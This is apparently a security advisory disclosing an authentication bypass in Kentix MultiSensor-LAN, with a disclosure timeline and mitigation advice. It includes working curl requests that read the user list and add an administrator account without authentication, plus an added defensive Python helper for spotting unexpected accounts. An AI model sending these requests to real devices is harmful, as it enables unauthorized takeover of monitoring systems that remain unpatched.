Advisory ID: SYSS-2018-043
Product: MultiSensor-LAN
Manufacturer: Kentix GmbH
Affected Version(s): 5.63.00 <=
Tested Version(s): 5.60.01, 5.63.00
Vulnerability Type: Authentication Bypass Using an Alternate Path or
                    Channel (CWE-288)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2018-12-03
Solution Date: -
Public Disclosure: 2019-01-17
CVE Reference: CVE-2018-19783
Authors of Advisory: Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Kentix MultiSensor LAN is a web-based management solution for
monitoring server rooms (see [1]).

The web site authentication can be bypassed to add another
administrator account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The web-based application does not use the usual session concept with a
session cookie for managing authenticated user sessions. Some URLs are
protected with HTTP Basic Authentication, but the user management web
page can be accessed and used without any authentication.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The current user list can be read out without any authentication (all
values are Base64-encoded) using the following HTTP request:

$ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io
{
  "A05001":"YWRtaW4=",
  "A05002":"KioqKioq",
  "A05003":"",
  "A05021":"MASKED",
  "A05022":"KioqKioq",
  "A05023":"MASKED",
  "A05041":"MASKED",
  "A05042":"KioqKioq",
  "A05043":"MASKED",
  "A05061":"",
  "A05062":"",
  "A05063":"",
  "A05081":"",
  "A05082":"",
  "A05083":""
}

There are five possible accounts, which are represented by the fields
A0500[1-3], A0502[1-3], and so on. The first field is the user name, the
second is the masked password, and the last one is the optional e-mail
address.

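Added example (not part of the SySS advisory): a Python helper a device
owner could run over a saved user-list response to decode the five
account slots described above and report accounts that are not on an
approved list. The function names and the baseline set are assumptions
made for this example; the sample body is the advisory's own listing.

```python
import base64
import binascii
import json

# Slot prefixes as listed in the advisory: A0500x, A0502x, ... A0508x.
SLOTS = ("A0500", "A0502", "A0504", "A0506", "A0508")

# Response body copied from the advisory's listing after an account was added.
SAMPLE = """{ "A05001":"YWRtaW4=", "A05002":"KioqKioq", "A05003":"",
"A05021":"MASKED", "A05022":"KioqKioq", "A05023":"MASKED",
"A05041":"MASKED", "A05042":"KioqKioq", "A05043":"MASKED",
"A05061":"MWJj", "A05062":"KioqKioq", "A05063":"",
"A05081":"", "A05082":"", "A05083":"" }"""


def decode_field(value):
    """Base64-decode one field; return None if it is not valid Base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None  # e.g. the redacted "MASKED" entries in the listing


def parse_accounts(response_text):
    """Return one record per occupied slot (field 1 = name, 3 = e-mail)."""
    fields = json.loads(response_text)
    accounts = []
    for slot in SLOTS:
        raw_user = fields.get(slot + "1", "")
        if not raw_user:
            continue  # empty slot, no account configured
        accounts.append({
            "slot": slot,
            "user": decode_field(raw_user),
            "email": decode_field(fields.get(slot + "3", "")) or None,
        })
    return accounts


def unexpected_accounts(accounts, baseline):
    """Accounts not in the approved baseline; undecodable names are
    always reported because they cannot be verified."""
    return [a for a in accounts
            if a["user"] is None or a["user"] not in baseline]


if __name__ == "__main__":
    for acct in unexpected_accounts(parse_accounts(SAMPLE), {"admin"}):
        print("review slot", acct["slot"], "user:", acct["user"])
```
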
With the following simple HTTP request, another user account is created
(username and password are sent Base64-encoded, too):

$ curl --data 'action=1&A05061=MWJj&A05062=MWJj&save=3' --url http://$TARGETIP/io
{
  "A05061":"MWJj",
  "A05062":"KioqKioq"
}

With this created account, the web interface can be used very easily.

It can be verified that the user account was added successfully via the
previously shown HTTP request:

$ curl --data 'action=0&A05000=1' --url http://$TARGETIP/io
{
  "A05001":"YWRtaW4=",
  "A05002":"KioqKioq",
  "A05003":"",
  "A05021":"MASKED",
  "A05022":"KioqKioq",
  "A05023":"MASKED",
  "A05041":"MASKED",
  "A05042":"KioqKioq",
  "A05043":"MASKED",
  "A05061":"MWJj",
  "A05062":"KioqKioq",
  "A05063":"",
  "A05081":"",
  "A05082":"",
  "A05083":""
}

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

As there was no response from the vendor, SySS GmbH is not aware of a
solution for this security issue.

Kentix MultiSensor LAN devices should be operated only in
firewall-protected LANs with enabled network access control to reduce
the risk of unauthorized manipulations.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-11-30: Detection of the vulnerability
2018-12-01: CVE number assigned
2018-12-03: Vulnerability reported to manufacturer
2019-01-17: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Support web site
    https://kentix.com/en/download-support/software-manuals-for-devices-until-01-2018/
[2] SySS Security Advisory SYSS-2018-043
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-043.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Micha Borrmann of SySS GmbH.

E-Mail: micha.borrmann (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Micha_Borrmann.asc
Key Fingerprint: F2E7 C6A5 9950 84ED 7AD6 0DD4 EDBE 26E7 14EA 5876

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en